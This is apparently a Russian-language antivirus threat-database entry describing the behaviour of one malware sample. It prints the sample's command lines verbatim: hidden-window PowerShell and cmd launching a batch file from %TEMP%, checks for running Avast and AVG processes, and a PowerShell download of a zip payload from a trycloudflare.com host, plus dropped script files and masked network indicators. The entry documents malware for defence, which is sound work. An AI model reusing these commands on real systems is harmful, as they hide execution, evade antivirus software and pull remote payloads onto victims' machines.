Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"%TEMP%\yap.bat\" hidden' -WindowStyle Hidden"
- '<SYSTEM32>\tasklist.exe' /FI "IMAGENAME eq AvastUI.exe"
- '<SYSTEM32>\find.exe' /i "AvastUI.exe"
- '<SYSTEM32>\tasklist.exe' /FI "IMAGENAME eq avgui.exe"
- '<SYSTEM32>\find.exe' /i "avgui.exe"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFi...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\una0.wsh
- %WINDIR%\ServiceProfiles\LocalService\appdata\local\temp\tfsstore\tfs_dav\re_018903890241.pdf0.wsf
Сетевая активность
Подключается к
- 'n-##########toria-venture.trycloudflare.com':443
TCP
Другие
- 'ja###########roxy-installed.trycloudflare.com':443
UDP
- DNS ASK n-##########toria-venture.trycloudflare.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\yap.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\yap.bat" hidden (со скрытым окном)
